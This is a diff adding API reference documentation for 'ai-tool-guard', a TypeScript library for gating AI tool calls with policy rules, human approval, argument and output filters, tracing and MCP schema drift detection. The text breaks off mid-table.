function | Field must equal one of the allowed values | +| `denylist` | function | Field must not equal any denied value | +| `regexGuard` | function | Field must (or must not) match a regex | +| `piiGuard` | function | Detect PII patterns in a string field | +| `evaluateArgGuards` | function | Run all argument guards for a tool call | +| `checkInjection` | function | Heuristic prompt injection scan | +| `secretsFilter` | function | Output filter that redacts common secrets | +| `piiOutputFilter` | function | Output filter that redacts PII | +| `customFilter` | function | Wrap a function as an `OutputFilter` | +| `runOutputFilters` | function | Execute a chain of output filters | +| `RateLimiter` | class | Sliding-window rate limiter with concurrency control | +| `ArgGuardResult` | interface | Result of running argument guards | +| `InjectionCheckResult` | interface | Injection scan outcome | +| `RedactionRule` | interface | Pattern-based redaction rule definition | +| `OutputFilterChainResult` | interface | Aggregate result of running a filter chain | +| `RateLimitAcquireResult` | interface | Outcome of a rate limit acquire attempt | + +### OpenTelemetry (`ai-tool-guard/otel`) + +| Export | Kind | Description | +|---|---|---| +| `createTracer` | function | Obtain a tracer (real OTel or no-op fallback) | +| `spanFromDecision` | function | Create a policy-evaluation span from a `DecisionRecord` | +| `startToolExecutionSpan` | function | Create a span for tool execution | +| `startApprovalSpan` | function | Create a span for approval wait time | +| `ATTR` | constant | Object of 16 semantic attribute key strings | +| `Span` | interface | Minimal span interface | +| `Tracer` | interface | Minimal tracer interface | +| `OtelConfig` | interface | OTel configuration options | + +### MCP (`ai-tool-guard/mcp`) + +| Export | Kind | Description | +|---|---|---| +| `computeFingerprint` | function | SHA-256 fingerprint of a tool schema | +| `pinFingerprint` | function | Create 
a `McpToolFingerprint` record | +| `detectDrift` | function | Compare current schemas against pinned fingerprints | +| `FingerprintStore` | class | In-memory fingerprint store with JSON import/export | +| `McpToolFingerprint` | interface | Pinned schema fingerprint record | +| `McpDriftResult` | interface | Aggregate drift detection result | +| `McpDriftChange` | interface | Individual changed-tool detail | + +--- + +## Subpages + +- [Core](./core.md) +- [Policy](./policy.md) +- [Approval](./approval.md) +- [Guards](./guards.md) +- [OpenTelemetry](./otel.md) +- [MCP](./mcp.md) +- [All Types](./types.md) diff --git a/docs/api/mcp.md b/docs/api/mcp.md new file mode 100644 index 0000000..40e6035 --- /dev/null +++ b/docs/api/mcp.md @@ -0,0 +1,257 @@ +# MCP — `ai-tool-guard/mcp` + +The MCP module provides tool schema fingerprinting and drift detection for Model +Context Protocol servers. It detects when a remote tool's schema changes between +deployments, which can indicate an inadvertent update or a supply-chain attack. + +```ts +import { + computeFingerprint, + pinFingerprint, + detectDrift, + FingerprintStore, +} from "ai-tool-guard/mcp"; +``` + +--- + +## Functions + +### `computeFingerprint` + +```ts +async function computeFingerprint( + toolName: string, + schema: unknown, +): Promise<string> +``` + +Compute a deterministic SHA-256 fingerprint for a tool's schema. The tool name +and schema are combined and canonicalized (keys sorted recursively) before +hashing, so fingerprints are stable regardless of JSON key order. 
+ +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `schema` | `unknown` | Yes | The tool's schema object (typically the Zod or JSON Schema definition) | + +**Returns** `Promise<string>` — hex-encoded SHA-256 hash + +--- + +### `pinFingerprint` + +```ts +async function pinFingerprint( + toolName: string, + serverId: string, + schema: unknown, + environment?: string, +): Promise<McpToolFingerprint> +``` + +Create a `McpToolFingerprint` record by computing the schema hash and capturing +metadata. Store the result in a `FingerprintStore` or a persistent database for +later drift comparison. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool to pin | +| `serverId` | `string` | Yes | Identifier of the MCP server serving this tool | +| `schema` | `unknown` | Yes | Current schema to pin | +| `environment` | `string` | No | Environment tag such as `"production"` or `"staging"` | + +**Returns** `Promise<McpToolFingerprint>` + +**Example** + +```ts +const fp = await pinFingerprint("web_search", "mcp-server-prod", webSearchSchema, "production"); +store.set(fp); +``` + +--- + +### `detectDrift` + +```ts +async function detectDrift( + pinnedFingerprints: McpToolFingerprint[], + currentSchemas: Array<{ + toolName: string; + serverId: string; + schema: unknown; + }>, +): Promise<McpDriftResult> +``` + +Compare a set of current tool schemas against their pinned fingerprints. For each +current schema, the function recomputes the fingerprint and compares it against +the pinned hash. + +Two conditions generate a `McpDriftChange` entry: + +1. The tool is present in `currentSchemas` but absent from `pinnedFingerprints` + (new, unpinned tool). +2. The tool is pinned but its computed hash differs from the stored hash. 
+ +| Parameter | Type | Required | Description | +|---|---|---|---| +| `pinnedFingerprints` | `McpToolFingerprint[]` | Yes | Previously pinned fingerprint records | +| `currentSchemas` | `Array<{ toolName: string; serverId: string; schema: unknown }>` | Yes | Current schemas from the live MCP server | + +**Returns** `Promise<McpDriftResult>` + +**Example** + +```ts +const driftResult = await detectDrift(store.getAll(), liveSchemas); + +if (driftResult.drifted) { + for (const change of driftResult.changes) { + console.error(change.remediation); + } +} +``` + +--- + +## Classes + +### `FingerprintStore` + +Simple in-memory reference implementation for storing pinned fingerprints. For +production use, persist the data by calling `export()` and storing the JSON, then +reloading with `import()` on startup. + +#### Constructor + +```ts +new FingerprintStore() +``` + +No parameters. Initializes an empty in-memory map. + +#### Methods + +##### `set` + +```ts +set(fp: McpToolFingerprint): void +``` + +Pin a fingerprint. Overwrites any existing entry for the same `serverId` + +`toolName` combination. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `fp` | `McpToolFingerprint` | Yes | Fingerprint record to store | + +##### `get` + +```ts +get(serverId: string, toolName: string): McpToolFingerprint | undefined +``` + +Retrieve a pinned fingerprint by server and tool name. Returns `undefined` if not +found. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `serverId` | `string` | Yes | MCP server identifier | +| `toolName` | `string` | Yes | Tool name | + +**Returns** `McpToolFingerprint | undefined` + +##### `getAll` + +```ts +getAll(): McpToolFingerprint[] +``` + +Return all pinned fingerprints as an array. Suitable for passing directly to +`detectDrift()`. + +**Returns** `McpToolFingerprint[]` + +##### `delete` + +```ts +delete(serverId: string, toolName: string): boolean +``` + +Remove a pinned fingerprint. 
Returns `true` if an entry was deleted, `false` if +no matching entry existed. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `serverId` | `string` | Yes | MCP server identifier | +| `toolName` | `string` | Yes | Tool name | + +**Returns** `boolean` + +##### `export` + +```ts +export(): string +``` + +Serialize all fingerprints to a JSON string for persistence. The output is an +array of `McpToolFingerprint` objects formatted with two-space indentation. + +**Returns** `string` + +##### `import` + +```ts +import(json: string): void +``` + +Deserialize fingerprints from a JSON string and add them to the store. Validates +that each entry has `toolName`, `serverId`, `schemaHash`, and `pinnedAt` as +strings. Throws an `Error` if the JSON is invalid or any entry fails validation. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `json` | `string` | Yes | JSON string produced by `export()` | + +--- + +## Interfaces + +### `McpToolFingerprint` + +A pinned schema fingerprint record for a single MCP tool. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `serverId` | `string` | Yes | Identifier of the MCP server | +| `schemaHash` | `string` | Yes | SHA-256 hex hash of the canonicalized schema | +| `pinnedAt` | `string` | Yes | ISO-8601 timestamp of when the fingerprint was created | +| `environment` | `string` | No | Environment tag (e.g. `"production"`, `"staging"`) | + +--- + +### `McpDriftResult` + +Aggregate result of `detectDrift()`. + +| Field | Type | Description | +|---|---|---| +| `drifted` | `boolean` | `true` when at least one tool has changed or is unpinned | +| `changes` | `McpDriftChange[]` | Detailed change records for every drifted or unpinned tool | + +--- + +### `McpDriftChange` + +Detail for a single tool that has drifted or is not pinned. 
+ +| Field | Type | Description | +|---|---|---| +| `toolName` | `string` | Name of the changed tool | +| `serverId` | `string` | MCP server identifier | +| `expectedHash` | `string` | Pinned hash, or `"(not pinned)"` for new tools | +| `actualHash` | `string` | Currently computed hash | +| `remediation` | `string` | Human-readable description of what changed and how to resolve it | diff --git a/docs/api/otel.md b/docs/api/otel.md new file mode 100644 index 0000000..ece8cc0 --- /dev/null +++ b/docs/api/otel.md @@ -0,0 +1,215 @@ +# OpenTelemetry — `ai-tool-guard/otel` + +The OTel module provides tracer creation and pre-built span helpers for the main +guard pipeline stages. It depends on `@opentelemetry/api` as an optional peer +dependency; when the package is not installed, all functions return no-op +implementations that produce zero overhead. + +```ts +import { + createTracer, + spanFromDecision, + startToolExecutionSpan, + startApprovalSpan, + ATTR, +} from "ai-tool-guard/otel"; +import type { Span, Tracer } from "ai-tool-guard/otel"; +``` + +--- + +## Functions + +### `createTracer` + +```ts +function createTracer(config?: OtelConfig): Tracer +``` + +Obtain a tracer instance. If `@opentelemetry/api` is available in the runtime, +returns the real OTel tracer registered under the configured name. Otherwise +returns a no-op tracer. + +The result is cached per tracer name to avoid repeated import attempts. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `config` | `OtelConfig` | No | OTel configuration options | + +**Returns** `Tracer` + +**Example** + +```ts +const tracer = createTracer({ tracerName: "my-app", enabled: true }); +const span = tracer.startSpan("custom.operation"); +span.end(); +``` + +--- + +### `spanFromDecision` + +```ts +function spanFromDecision( + tracer: Tracer, + record: DecisionRecord, + config?: OtelConfig, +): Span +``` + +Create and populate a span for a policy evaluation step. 
The span name is +`"ai_tool_guard.policy_eval"`. All standard decision attributes are set from the +`DecisionRecord`. If the verdict is `"deny"`, the span status is set to ERROR. + +The caller is responsible for calling `span.end()` when the work is done. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `tracer` | `Tracer` | Yes | Tracer obtained from `createTracer()` | +| `record` | `DecisionRecord` | Yes | Decision record to read attributes from | +| `config` | `OtelConfig` | No | OTel config; `defaultAttributes` are merged into span attributes | + +**Returns** `Span` + +--- + +### `startToolExecutionSpan` + +```ts +function startToolExecutionSpan( + tracer: Tracer, + toolName: string, + config?: OtelConfig, +): Span +``` + +Create a span for the tool execution phase. The span name is +`"ai_tool_guard.tool_execute"`. Sets `ATTR.TOOL_NAME` on the span. + +The caller is responsible for calling `span.end()` (and `span.setStatus()` on +error) when execution completes. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `tracer` | `Tracer` | Yes | Tracer instance | +| `toolName` | `string` | Yes | Name of the tool being executed | +| `config` | `OtelConfig` | No | OTel config; `defaultAttributes` are merged | + +**Returns** `Span` + +--- + +### `startApprovalSpan` + +```ts +function startApprovalSpan( + tracer: Tracer, + toolName: string, + tokenId: string, + config?: OtelConfig, +): Span +``` + +Create a span that measures approval wait time. The span name is +`"ai_tool_guard.approval_wait"`. Sets `ATTR.TOOL_NAME` and +`ATTR.APPROVAL_TOKEN_ID` as initial attributes. 
+ +| Parameter | Type | Required | Description | +|---|---|---|---| +| `tracer` | `Tracer` | Yes | Tracer instance | +| `toolName` | `string` | Yes | Name of the tool awaiting approval | +| `tokenId` | `string` | Yes | Approval token ID for correlation | +| `config` | `OtelConfig` | No | OTel config; `defaultAttributes` are merged | + +**Returns** `Span` + +--- + +## Constants + +### `ATTR` + +Object of 16 semantic attribute key strings. Import and use these constants when +setting span attributes to ensure consistent naming across services. + +```ts +import { ATTR } from "ai-tool-guard/otel"; +span.setAttribute(ATTR.DECISION_VERDICT, "deny"); +``` + +| Key | String value | +|---|---| +| `ATTR.TOOL_NAME` | `"ai_tool_guard.tool.name"` | +| `ATTR.TOOL_RISK_LEVEL` | `"ai_tool_guard.tool.risk_level"` | +| `ATTR.TOOL_RISK_CATEGORIES` | `"ai_tool_guard.tool.risk_categories"` | +| `ATTR.DECISION_VERDICT` | `"ai_tool_guard.decision.verdict"` | +| `ATTR.DECISION_REASON` | `"ai_tool_guard.decision.reason"` | +| `ATTR.DECISION_MATCHED_RULES` | `"ai_tool_guard.decision.matched_rules"` | +| `ATTR.DECISION_DRY_RUN` | `"ai_tool_guard.decision.dry_run"` | +| `ATTR.APPROVAL_TOKEN_ID` | `"ai_tool_guard.approval.token_id"` | +| `ATTR.APPROVAL_APPROVED` | `"ai_tool_guard.approval.approved"` | +| `ATTR.APPROVAL_PATCHED` | `"ai_tool_guard.approval.patched"` | +| `ATTR.INJECTION_SCORE` | `"ai_tool_guard.injection.score"` | +| `ATTR.INJECTION_SUSPECTED` | `"ai_tool_guard.injection.suspected"` | +| `ATTR.RATE_LIMIT_ALLOWED` | `"ai_tool_guard.rate_limit.allowed"` | +| `ATTR.OUTPUT_REDACTED` | `"ai_tool_guard.output.redacted"` | +| `ATTR.OUTPUT_BLOCKED` | `"ai_tool_guard.output.blocked"` | +| `ATTR.MCP_DRIFT_DETECTED` | `"ai_tool_guard.mcp.drift_detected"` | + +--- + +## Interfaces + +### `Span` + +Minimal span interface. The real OTel `Span` type satisfies this interface, as +does the no-op implementation used when `@opentelemetry/api` is absent. 
+ +```ts +interface Span { + setAttribute(key: string, value: string | number | boolean): void; + setStatus(status: { code: number; message?: string }): void; + end(): void; +} +``` + +| Method | Description | +|---|---| +| `setAttribute(key, value)` | Set a span attribute. Value must be a primitive. | +| `setStatus({ code, message? })` | Set the span status. Code `2` = ERROR, `1` = OK, `0` = UNSET. | +| `end()` | Mark the span as finished so the OTel SDK can process and export it. | + +--- + +### `Tracer` + +Minimal tracer interface used to create spans. + +```ts +interface Tracer { + startSpan( + name: string, + options?: { attributes?: Record<string, string | number | boolean> }, + ): Span; +} +``` + +| Method | Description | +|---|---| +| `startSpan(name, options?)` | Start a new span with the given name and optional initial attributes. | + +--- + +## Configuration + +### `OtelConfig` + +Configuration for the OTel integration, passed to `createTracer()` and span +helpers. + +| Field | Type | Required | Description | +|---|---|---|---| +| `enabled` | `boolean` | No | When `false`, all functions return no-op implementations regardless of whether `@opentelemetry/api` is installed. Default: `true` when OTel API is available | +| `tracerName` | `string` | No | Custom tracer name registered with OTel. Default: `"ai-tool-guard"` | +| `defaultAttributes` | `Record<string, string | number | boolean>` | No | Additional attributes merged into every span created by span helpers | diff --git a/docs/api/policy.md b/docs/api/policy.md new file mode 100644 index 0000000..e472776 --- /dev/null +++ b/docs/api/policy.md @@ -0,0 +1,287 @@ +# Policy — `ai-tool-guard/policy` + +The policy module provides the rule evaluation engine, ergonomic rule builders, +preset bundles, and a simulation runner for dry-run analysis. 
+ +```ts +import { + evaluatePolicy, + allow, + deny, + requireApproval, + defaultPolicy, + readOnlyPolicy, + simulate, +} from "ai-tool-guard/policy"; +``` + +--- + +## Functions + +### `evaluatePolicy` + +```ts +async function evaluatePolicy( + ctx: PolicyContext, + options: GuardOptions, + toolConfig?: { riskLevel?: RiskLevel; riskCategories?: RiskCategory[] }, +): Promise<DecisionRecord> +``` + +Evaluate a tool call against the configured policy rules and/or external backend. + +**Evaluation order:** + +1. If a `PolicyBackend` is configured, delegate to it first. +2. Evaluate built-in `PolicyRule` entries in descending priority order. +3. Merge results using severity escalation: `deny` > `require-approval` > `allow`. +4. If no rule matches, default to `"allow"`. + +The result is always a full `DecisionRecord` regardless of verdict. + +**Parameters** + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `ctx` | `PolicyContext` | Yes | Tool call context: name, args, user attributes, conversation | +| `options` | `GuardOptions` | Yes | Guard configuration containing rules and/or backend | +| `toolConfig` | `{ riskLevel?: RiskLevel; riskCategories?: RiskCategory[] }` | No | Per-tool risk metadata used when evaluating risk-level-based rules | + +**Returns** `Promise<DecisionRecord>` + +--- + +### `allow` + +```ts +function allow(opts: { + tools: string | string[]; + riskLevels?: RiskLevel[]; + condition?: (ctx: PolicyContext) => boolean | Promise<boolean>; + description?: string; + priority?: number; +}): PolicyRule +``` + +Create a `PolicyRule` with verdict `"allow"`. + +**Parameters** + +| Field | Type | Required | Description | +|---|---|---|---| +| `tools` | `string \| string[]` | Yes | Tool name glob pattern(s). Use `"*"` for all tools. 
| +| `riskLevels` | `RiskLevel[]` | No | Restrict to tools with these risk levels | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise<boolean>` | No | Predicate for attribute-based matching | +| `description` | `string` | No | Human-readable description recorded in the decision | +| `priority` | `number` | No | Higher values are evaluated first. Default: `0` | + +**Returns** `PolicyRule` + +--- + +### `deny` + +```ts +function deny(opts: { + tools: string | string[]; + riskLevels?: RiskLevel[]; + condition?: (ctx: PolicyContext) => boolean | Promise<boolean>; + description?: string; + priority?: number; +}): PolicyRule +``` + +Create a `PolicyRule` with verdict `"deny"`. Same options shape as `allow()`. + +**Returns** `PolicyRule` + +--- + +### `requireApproval` + +```ts +function requireApproval(opts: { + tools: string | string[]; + riskLevels?: RiskLevel[]; + condition?: (ctx: PolicyContext) => boolean | Promise<boolean>; + description?: string; + priority?: number; +}): PolicyRule +``` + +Create a `PolicyRule` with verdict `"require-approval"`. Same options shape as +`allow()`. + +**Returns** `PolicyRule` + +--- + +### `defaultPolicy` + +```ts +function defaultPolicy(): PolicyRule[] +``` + +Return a preset rule bundle with three rules: + +- `allow` all tools with `riskLevel: "low"` +- `requireApproval` for tools with `riskLevel: "medium"` +- `deny` tools with `riskLevel: "high"` or `"critical"` + +All three rules use `tools: "*"` and `priority: 0`. + +**Returns** `PolicyRule[]` + +**Example** + +```ts +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => handleApproval(token), +}); +``` + +--- + +### `readOnlyPolicy` + +```ts +function readOnlyPolicy(readToolPatterns: string[]): PolicyRule[] +``` + +Return a two-rule bundle that allows a specified set of read-only tools and denies +everything else. 
+ +| Parameter | Type | Required | Description | +|---|---|---|---| +| `readToolPatterns` | `string[]` | Yes | Glob patterns for tools that should be allowed | + +**Returns** `PolicyRule[]` — `[allow({ tools: readToolPatterns, priority: 10 }), deny({ tools: "*", priority: 0 })]` + +**Example** + +```ts +const guard = createToolGuard({ + rules: readOnlyPolicy(["db.query", "fs.read*"]), +}); +``` + +--- + +### `simulate` + +```ts +async function simulate( + trace: RecordedToolCall[], + options: GuardOptions, + toolConfigs?: Record, +): Promise +``` + +Run a dry-run policy evaluation over a recorded trace of tool calls. No tools are +executed. Every call produces a `DecisionRecord` with `dryRun: true`. + +| Parameter | Type | Required | Description | +|---|---|---|---| +| `trace` | `RecordedToolCall[]` | Yes | Sequence of recorded tool calls to evaluate | +| `options` | `GuardOptions` | Yes | The policy configuration to evaluate against | +| `toolConfigs` | `Record` | No | Per-tool risk metadata for the simulation | + +**Returns** `Promise` + +**Example** + +```ts +const result = await simulate(recordedCalls, { rules: defaultPolicy() }); +console.log(result.summary); +// { total: 10, allowed: 7, denied: 2, requireApproval: 1 } +``` + +--- + +## Interfaces + +### `PolicyRule` + +Atomic unit of the built-in policy engine. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Stable identifier used in `DecisionRecord.matchedRules` | +| `description` | `string` | No | Human-readable explanation shown in decision records | +| `toolPatterns` | `string[]` | Yes | Glob patterns matched against `PolicyContext.toolName` | +| `riskLevels` | `RiskLevel[]` | No | If set, rule only matches tools with one of these risk levels | +| `verdict` | `DecisionVerdict` | Yes | Action to take: `"allow"`, `"deny"`, or `"require-approval"` | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise` | No | Optional async predicate; rule skipped when it returns `false` | +| `priority` | `number` | No | Evaluation order; higher = evaluated first. Default: `0` | + +--- + +### `PolicyBackend` + +Adapter interface for delegating decisions to an external policy engine such as +OPA or Cedar. + +```ts +interface PolicyBackend { + name: string; + evaluate(ctx: PolicyContext): Promise; +} +``` + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Unique name used in logging and tracing | +| `evaluate` | `(ctx: PolicyContext) => Promise` | Yes | Evaluate a tool invocation and return a verdict | + +--- + +### `PolicyBackendResult` + +Result returned by `PolicyBackend.evaluate()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `verdict` | `DecisionVerdict` | Yes | The verdict from the external engine | +| `reason` | `string` | Yes | Human-readable explanation | +| `matchedRules` | `string[]` | Yes | Rule IDs or names that matched in the external engine | +| `attributes` | `Record` | No | Additional attributes merged into the `DecisionRecord` | + +--- + +### `PolicyContext` + +Context passed into every policy evaluation. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool being invoked | +| `args` | `Record` | Yes | Arguments the model wants to pass | +| `userAttributes` | `Record` | Yes | Caller-supplied attributes (user id, roles, tenant, etc.) | +| `conversation` | `ConversationContext` | No | Conversation-level metadata for contextual policies | +| `dryRun` | `boolean` | No | When `true`, the engine is in simulation mode | + +--- + +### `RecordedToolCall` + +A captured tool call used as input to `simulate()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `args` | `Record` | Yes | Arguments of the call | +| `userAttributes` | `Record` | No | User attribute overrides for this simulation entry | + +--- + +### `SimulationResult` + +Aggregate output of `simulate()`. + +| Field | Type | Description | +|---|---|---| +| `decisions` | `DecisionRecord[]` | All decision records produced, one per recorded call | +| `summary` | `{ total: number; allowed: number; denied: number; requireApproval: number }` | Counts by verdict | +| `blocked` | `Array<{ toolCall: RecordedToolCall; decision: DecisionRecord }>` | Calls that would have been denied or required approval | diff --git a/docs/api/types.md b/docs/api/types.md new file mode 100644 index 0000000..8a9250b --- /dev/null +++ b/docs/api/types.md @@ -0,0 +1,438 @@ +# All Types — `ai-tool-guard` + +This page documents every exported type and interface from `src/types.ts`, +organized by domain. All of these are re-exported from the root `ai-tool-guard` +path. 
+ +```ts +import type { + RiskLevel, + RiskCategory, + DecisionVerdict, + DecisionRecord, + PolicyContext, + ConversationContext, + PolicyRule, + PolicyBackend, + PolicyBackendResult, + ToolGuardConfig, + ArgGuard, + ZodArgGuard, + OutputFilterVerdict, + OutputFilter, + OutputFilterResult, + ApprovalToken, + ApprovalResolution, + ApprovalHandler, + RateLimitConfig, + RateLimitState, + InjectionDetectorConfig, + McpToolFingerprint, + McpDriftResult, + McpDriftChange, + OtelConfig, + GuardOptions, +} from "ai-tool-guard"; +``` + +--- + +## Risk + +### `RiskLevel` + +```ts +type RiskLevel = "low" | "medium" | "high" | "critical"; +``` + +Assigned to tools or tool calls to indicate their potential impact. Used by +built-in policy rules to match calls and by `DecisionRecord` for audit. + +| Value | Typical use | +|---|---| +| `"low"` | Read-only, idempotent, no side effects | +| `"medium"` | Writes to non-critical data, reversible | +| `"high"` | Irreversible writes, sensitive data access | +| `"critical"` | Payments, authentication, mass data operations | + +--- + +### `RiskCategory` + +```ts +type RiskCategory = + | "data-read" + | "data-write" + | "data-delete" + | "network" + | "filesystem" + | "authentication" + | "payment" + | "pii" + | "custom"; +``` + +Human-readable classification tags attached to tools for audit trails and +policy targeting. Multiple categories can be combined on a single tool. + +--- + +## Decision + +### `DecisionVerdict` + +```ts +type DecisionVerdict = "allow" | "deny" | "require-approval"; +``` + +The outcome of a policy evaluation. + +| Value | Meaning | +|---|---| +| `"allow"` | The tool call may proceed | +| `"deny"` | The tool call is blocked; `ToolGuardError` with code `"policy-denied"` is thrown | +| `"require-approval"` | The call is paused pending human approval | + +--- + +### `DecisionRecord` + +Structured record produced for every policy evaluation. 
Emitted to +`GuardOptions.onDecision` and attached to `ToolGuardError.decision`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Unique correlation ID (generated per evaluation) | +| `timestamp` | `string` | Yes | ISO-8601 timestamp of when the decision was made | +| `verdict` | `DecisionVerdict` | Yes | Final verdict | +| `toolName` | `string` | Yes | Name of the tool under evaluation | +| `matchedRules` | `string[]` | Yes | IDs of all policy rules that matched | +| `riskLevel` | `RiskLevel` | Yes | Effective risk level of the tool | +| `riskCategories` | `RiskCategory[]` | Yes | Risk categories that applied | +| `attributes` | `Record` | Yes | Merged user and backend attributes consumed during evaluation | +| `reason` | `string` | Yes | Human-readable explanation of the verdict | +| `redactions` | `string[]` | No | Fields that were redacted in the output, if any | +| `evalDurationMs` | `number` | Yes | Time spent in policy evaluation in milliseconds | +| `dryRun` | `boolean` | Yes | Whether this was a simulation (dry-run) evaluation | + +--- + +## Policy + +### `PolicyContext` + +Context passed into every policy evaluation. Constructed by `ToolGuard` for each +tool invocation. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool being invoked | +| `args` | `Record` | Yes | Arguments the model wants to pass | +| `userAttributes` | `Record` | Yes | Caller-supplied attributes resolved by `GuardOptions.resolveUserAttributes` | +| `conversation` | `ConversationContext` | No | Conversation-level metadata resolved by `GuardOptions.resolveConversationContext` | +| `dryRun` | `boolean` | No | When `true`, the engine is in simulation mode and tools are not executed | + +--- + +### `ConversationContext` + +Conversation-level metadata available to context-aware policies. Useful for +detecting escalating risk within a session (e.g., repeated failures, recent +approvals). 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `sessionId` | `string` | No | Unique conversation or session identifier | +| `riskScore` | `number` | No | Cumulative risk score for the conversation | +| `priorFailures` | `number` | No | Count of prior tool failures in this conversation | +| `recentApprovals` | `string[]` | No | Tool names approved earlier in this conversation | +| `metadata` | `Record` | No | Arbitrary key-value bag for application-specific state | + +--- + +### `PolicyRule` + +Atomic unit of the built-in policy engine. For external DSL backends use +`PolicyBackend` instead. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Stable identifier used in `DecisionRecord.matchedRules` | +| `description` | `string` | No | Human-readable description recorded in the decision reason | +| `toolPatterns` | `string[]` | Yes | Glob patterns matched against `PolicyContext.toolName` (e.g. `"db.*"`, `"*"`) | +| `riskLevels` | `RiskLevel[]` | No | When set, the rule only matches tools whose effective risk level is in this list | +| `verdict` | `DecisionVerdict` | Yes | Action to take when this rule matches | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise` | No | Optional async predicate; the rule is skipped when it returns `false` | +| `priority` | `number` | No | Evaluation order: higher values are evaluated first. Default: `0` | + +--- + +### `PolicyBackend` + +Adapter interface for delegating policy decisions to an external engine such as +OPA (Open Policy Agent) or Cedar. + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Unique backend name used in logging and tracing | +| `evaluate` | `(ctx: PolicyContext) => Promise` | Yes | Evaluate a tool invocation and return a verdict with explanation | + +--- + +### `PolicyBackendResult` + +The result returned by `PolicyBackend.evaluate()`. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `verdict` | `DecisionVerdict` | Yes | The verdict from the external engine | +| `reason` | `string` | Yes | Human-readable explanation of the verdict | +| `matchedRules` | `string[]` | Yes | Rule IDs or names that matched within the external engine | +| `attributes` | `Record<string, unknown>` | No | Additional metadata merged into `DecisionRecord.attributes` | + +--- + +## Tools + +### `ToolGuardConfig` + +Per-tool metadata attached via `ToolGuard.guardTool()` or `ToolGuard.guardTools()`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `riskLevel` | `RiskLevel` | No | Risk level of this tool | +| `riskCategories` | `RiskCategory[]` | No | Classification tags for audit and explainability | +| `rateLimit` | `RateLimitConfig` | No | Per-tool rate limit (overrides `GuardOptions.defaultRateLimit`) | +| `maxConcurrency` | `number` | No | Per-tool concurrency cap (overrides `GuardOptions.defaultMaxConcurrency`) | +| `argGuards` | `ArgGuard[]` | No | Argument-level validators run before policy evaluation | +| `outputFilters` | `OutputFilter[]` | No | Output filters applied after tool execution | +| `requireApproval` | `boolean` | No | When `true`, forces approval even if the policy verdict is `"allow"` | +| `mcpFingerprint` | `string` | No | Expected schema hash; execution is blocked when the computed hash differs | + +--- + +## Guards + +### `ArgGuard` + +Interface for argument-level validators. Each guard targets a single field (or +all fields via `"*"`) and returns a failure message or `null`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Dot-path to the target argument field (e.g. 
`"user.email"`) or `"*"` for the whole args object | +| `validate` | `(value: unknown, ctx: PolicyContext) => string \| null \| Promise<string \| null>` | Yes | Validation function; return a string to deny with that reason, or `null` to pass | + +--- + +### `ZodArgGuard` + +Convenience shape for creating an `ArgGuard` backed by a Zod schema. Pass to +`zodGuard()` to produce an `ArgGuard`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `field` | `string` | Yes | Dot-path to the target argument field | +| `schema` | `z.ZodType` | Yes | Zod schema to validate the field value against | + +--- + +## Output + +### `OutputFilterVerdict` + +```ts +type OutputFilterVerdict = "pass" | "redact" | "block"; +``` + +Verdict returned by an `OutputFilter`. + +| Value | Meaning | +|---|---| +| `"pass"` | Output is unchanged and safe to return | +| `"redact"` | Output has been modified (sensitive fields replaced) | +| `"block"` | Output must be suppressed entirely; `ToolGuardError` with code `"output-blocked"` is thrown | + +--- + +### `OutputFilter` + +Interface for output egress controls. Filters run sequentially after tool +execution and before the result is returned to the AI model. + +| Field | Type | Required | Description | +|---|---|---|---| +| `name` | `string` | Yes | Identifier used in logging and `OutputFilterChainResult.blockedBy` | +| `filter` | `(result: unknown, ctx: PolicyContext) => Promise<OutputFilterResult>` | Yes | Inspect or transform the tool result | + +--- + +### `OutputFilterResult` + +Returned by `OutputFilter.filter()`. 
+ +| Field | Type | Required | Description | +|---|---|---|---| +| `verdict` | `OutputFilterVerdict` | Yes | Outcome: `"pass"`, `"redact"`, or `"block"` | +| `output` | `unknown` | Yes | The (possibly transformed) output to pass to the next filter or return | +| `redactedFields` | `string[]` | No | Names of fields that were redacted (recorded in the decision) | + +--- + +## Approval + +### `ApprovalToken` + +Correlation token created by `ApprovalManager` and sent to the `ApprovalHandler`. + +| Field | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Randomly generated unique token ID | +| `payloadHash` | `string` | Yes | SHA-256 hash of the canonical `{ toolName, args }` payload for tamper detection | +| `toolName` | `string` | Yes | Name of the tool awaiting approval | +| `originalArgs` | `Record<string, unknown>` | Yes | Deep clone of the tool arguments at request time | +| `createdAt` | `string` | Yes | ISO-8601 timestamp of token creation | +| `ttlMs` | `number` | No | Token TTL in milliseconds; token is invalid if `elapsed > ttlMs` | + +--- + +### `ApprovalResolution` + +The response returned by the `ApprovalHandler` to `ApprovalManager`. + +| Field | Type | Required | Description | +|---|---|---|---| +| 